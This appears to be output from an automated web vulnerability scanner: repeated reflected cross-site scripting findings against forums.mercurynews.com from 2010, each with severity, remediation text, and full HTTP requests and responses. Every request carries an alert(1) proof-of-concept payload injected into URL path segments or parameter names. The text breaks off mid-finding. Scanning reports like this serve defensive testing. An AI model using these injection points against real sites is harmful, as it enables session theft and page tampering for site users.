Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicab22e"-alert(1)-"d193185f86e/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:08 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:32 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22276
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topicab22e"-alert(1)-"d193185f86e/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose"; s.prop9=getCiQueryString("SOURCE"); s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF"); s. ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f6eb"-alert(1)-"db61396b3da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose5f6eb"-alert(1)-"db61396b3da HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:22 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22276
1.45. http://forums.mercurynews.com/topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0fec"-alert(1)-"b2737086bf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose?d0fec"-alert(1)-"b2737086bf5=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:50 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:14 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22243
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e42c8"-alert(1)-"227f159106e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topice42c8"-alert(1)-"227f159106e/645-sri-lanka-and-thailand-9-1-2010 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:18 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:42 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22160
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c06"-alert(1)-"12bdca9849b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/645-sri-lanka-and-thailand-9-1-201051c06"-alert(1)-"12bdca9849b HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:28 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22160
1.48. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/645-sri-lanka-and-thailand-9-1-2010
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b712"-alert(1)-"c150a5b4989 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/645-sri-lanka-and-thailand-9-1-2010?9b712"-alert(1)-"c150a5b4989=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:06 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:30 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46103
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b094c"-alert(1)-"6bbb6d77a1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicb094c"-alert(1)-"6bbb6d77a1d/about-gold-price-and-inflation HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:22 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22150
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfbe9"-alert(1)-"886bc9b8793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/about-gold-price-and-inflationcfbe9"-alert(1)-"886bc9b8793 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:27 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22150
1.51. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/about-gold-price-and-inflation
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8247c"-alert(1)-"6f9bb8c880e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/about-gold-price-and-inflation?8247c"-alert(1)-"6f9bb8c880e=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:09 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 95450
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ef8c"-alert(1)-"b016d693cff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic6ef8c"-alert(1)-"b016d693cff/al-qaida-is-us-puppet HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:14 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22132
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9afde"-alert(1)-"410d6a4b262 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/al-qaida-is-us-puppet9afde"-alert(1)-"410d6a4b262 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:27 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22132
1.54. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/al-qaida-is-us-puppet
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83c90"-alert(1)-"f57460e9cf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/al-qaida-is-us-puppet?83c90"-alert(1)-"f57460e9cf9=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:09 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 98974
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d738f"-alert(1)-"6fbedbd10eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicd738f"-alert(1)-"6fbedbd10eb/bp-oil-spill-was-created-to-push-war-on-iran HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:12 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:36 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22178
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e2ed"-alert(1)-"68b78d5cb8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/bp-oil-spill-was-created-to-push-war-on-iran1e2ed"-alert(1)-"68b78d5cb8c HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:21 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:45 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22178
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbc8e"-alert(1)-"7edf3fe785f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/bp-oil-spill-was-created-to-push-war-on-iran?dbc8e"-alert(1)-"7edf3fe785f=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:00 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 32485
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e534b"-alert(1)-"d6330c89b46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topice534b"-alert(1)-"d6330c89b46/ferret-theory-lv HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:02 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:26 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22122
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topice534b"-alert(1)-"d6330c89b46/ferret-theory-lv"; s.prop9=getCiQueryString("SOURCE"); s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF"); s.events="event1"; s.eVar2=getCiQueryString("SOURCE"); s.eVar4=s.pageName; s ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf2d6"-alert(1)-"4e7735b0a0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/ferret-theory-lvcf2d6"-alert(1)-"4e7735b0a0d HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:12 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:36 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22122
1.60. http://forums.mercurynews.com/topic/ferret-theory-lv [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/ferret-theory-lv
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fe24"-alert(1)-"022a6eab7a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/ferret-theory-lv?7fe24"-alert(1)-"022a6eab7a3=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:51 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:15 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21162
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2deab"-alert(1)-"4a706fc981a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
